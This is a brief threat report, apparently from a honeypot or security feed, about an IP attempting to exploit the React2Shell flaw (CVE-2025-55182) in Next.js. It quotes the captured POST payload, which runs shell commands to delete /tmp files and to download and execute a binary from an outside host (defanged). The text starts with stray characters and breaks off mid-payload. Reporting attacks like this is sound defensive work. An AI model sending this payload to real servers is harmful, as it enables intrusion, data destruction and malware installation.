xuf176.65.139[.]36 is trying to exploit CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js with the POST:
0="$1"&1={"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}&2="$@3"&3=""&4=[]&5={"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; rm -rf *; pkill xd.x86; wget hXXp://94.156.152[.]67/xd.x86; curl -O hXXp://94.156.152[.]67/xd.x86; chmod 777 xd.x86; ./xd.x86 nextjs\").toString();\n console.log(\"\\n[ ] RCE RESULT:\\n\" res);\n throw new Error(\"[ ] RCE SUCCESS: \" res);\n